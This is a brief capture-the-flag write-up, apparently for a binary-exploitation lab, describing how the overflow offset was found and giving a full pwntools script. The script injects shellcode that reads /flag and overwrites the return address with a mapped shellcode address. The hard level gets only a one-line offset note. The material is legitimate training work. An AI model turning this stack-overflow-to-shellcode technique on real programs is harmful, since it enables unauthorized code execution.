Hijack to (Mapped) Shellcode

Hijack to (Mapped) Shellcode (easy)

• Address to shellcode location is given in output
• GDB -> disas challenge -> lea rax,[rbp-0x80] -> offset should be 0x88
• But this gave one-byte off (indicated from helpful debug output); 0x89 worked:

from pwn import *

p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')
context.arch = 'amd64'

mapped_addr = 0x2edca000
shellcode = asm(shellcraft.amd64.cat('/flag'))
p.sendline(shellcode)

offset = 0x89
payload = b'A'*offset
payload += p64(mapped_addr)
p.sendline(payload)

p.interactive()

Hijack to (Mapped) Shellcode (hard)

0x79 instead of 0x89 in prev solution